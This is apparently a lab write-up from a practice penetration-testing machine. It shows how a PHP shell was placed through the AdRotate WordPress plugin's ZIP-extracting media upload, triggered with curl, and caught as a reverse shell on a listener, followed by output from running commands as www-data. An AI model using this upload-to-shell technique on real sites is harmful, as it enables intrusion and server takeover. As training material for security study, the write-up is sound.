AdRotate-Media File Upload
The target WordPress instance has the AdRotate plugin installed. While the plugin itself appears vulnerable due to its outdated version, it also has a critical inherent vulnerability due to its media handling feature; adrotate-media
Through the media handling feature, ZIP file could be uploaded that it gets automatically extracted on to the uploaded directory; /banners
The /banners directory was later located and code execution was confirmed with a testing payload.
/Play/Loly/3-Exploitation/attachments/{AE898451-32D9-4321-ACB8-6585798C4A4D}.png)
/Play/Loly/3-Exploitation/attachments/{EF12F748-7B85-477E-BDDB-4E8C65242D06}.png)
Successfully uploaded the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ curl -s http://loly.lc/wordpress/wp-content/banners/shell.phpInvoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.235] from (UNKNOWN) [192.168.120.121] 34248
SOCKET: Shell has connected! PID: 3764
whoami
www-data
hostname
ubuntu
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:36:61 brd ff:ff:ff:ff:ff:ff
inet 192.168.120.121/24 brd 192.168.120.255 scope global ens224
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:3661/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via exploiting the AdRotate’s file upload feature